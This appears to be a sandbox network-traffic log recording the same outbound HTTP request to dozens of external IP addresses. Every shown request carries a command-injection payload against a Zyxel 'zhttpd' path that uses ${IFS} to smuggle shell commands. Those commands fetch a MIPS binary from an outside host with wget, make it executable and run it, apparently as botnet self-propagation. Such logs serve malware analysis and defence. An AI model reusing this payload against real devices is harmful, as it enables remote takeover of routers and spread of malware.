                                            Jan 14, 2024 15:50:51.644742012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7400192.168.2.2354532114.16.176.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644784927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7401192.168.2.2334300130.6.47.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644826889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7402192.168.2.234341649.144.190.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644846916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7403192.168.2.2349032189.96.196.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644850016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7404192.168.2.234176092.159.158.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644913912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7405192.168.2.2359364102.65.188.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644931078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7406192.168.2.2359402156.143.178.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644948006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7407192.168.2.234873283.167.94.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644978046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7408192.168.2.2356356160.70.165.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645018101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7409192.168.2.23585662.253.248.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645049095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7410192.168.2.2360892220.234.240.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645064116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7411192.168.2.2336982137.203.29.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645083904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7412192.168.2.234460414.91.124.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645117044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7413192.168.2.236057625.199.170.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645158052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7414192.168.2.2354642190.130.137.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645173073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7415192.168.2.2349288136.41.36.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645193100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7416192.168.2.23387281.23.0.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645211935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7417192.168.2.235356688.152.65.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645237923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7418192.168.2.233835812.189.51.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645265102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7419192.168.2.2334316206.113.25.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645276070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7420192.168.2.2342052211.58.81.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645302057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7421192.168.2.2356082117.207.81.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645343065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7422192.168.2.23510564.34.179.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645361900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7423192.168.2.23486562.7.209.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645390034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7424192.168.2.2346300180.245.95.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645405054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7425192.168.2.2336518136.14.15.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645453930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7426192.168.2.234567252.73.162.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645471096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7427192.168.2.2343890172.95.197.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645507097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7428192.168.2.236053685.39.246.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645525932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7429192.168.2.2352266113.79.171.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645560980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7430192.168.2.234639051.236.102.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645570993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7431192.168.2.2348246101.58.217.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645634890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7432192.168.2.2337964160.198.224.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645654917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7433192.168.2.2357316128.229.153.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645694017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7434192.168.2.2336126124.143.243.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645711899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7435192.168.2.2353440143.149.74.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645730019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7436192.168.2.2359570103.105.170.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645771027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7437192.168.2.2342306114.113.175.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645802975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7438192.168.2.235196424.208.102.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645834923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7439192.168.2.2360762140.166.85.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645867109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7440192.168.2.2355616202.20.16.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645906925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7441192.168.2.2354016116.10.146.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645932913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7442192.168.2.2347176137.177.249.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645947933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7443192.168.2.235240839.198.251.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645951033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7444192.168.2.2336968132.161.217.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.645976067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7445192.168.2.2357084203.23.220.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646002054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7446192.168.2.2354128101.101.94.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646028042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7447192.168.2.2351660130.75.63.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646089077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7448192.168.2.2337562161.50.215.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646105051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7449192.168.2.234851268.54.32.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646131039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7450192.168.2.234313074.198.239.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646161079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7451192.168.2.2353494195.151.133.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646187067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7452192.168.2.2340172128.57.75.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646209002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7453192.168.2.2334186192.78.23.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646224022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7454192.168.2.235006261.226.188.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646259069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7455192.168.2.2357850176.103.224.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646284103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7456192.168.2.235579073.33.84.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646310091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7457192.168.2.2337898113.211.36.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646331072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7458192.168.2.234417693.211.230.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646361113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7459192.168.2.2333116156.98.228.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646384001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7460192.168.2.2358182117.42.98.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646404982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7461192.168.2.233927035.204.112.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646462917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7462192.168.2.2347862199.27.254.149443
                                            TimestampBytes transferredDirectionData
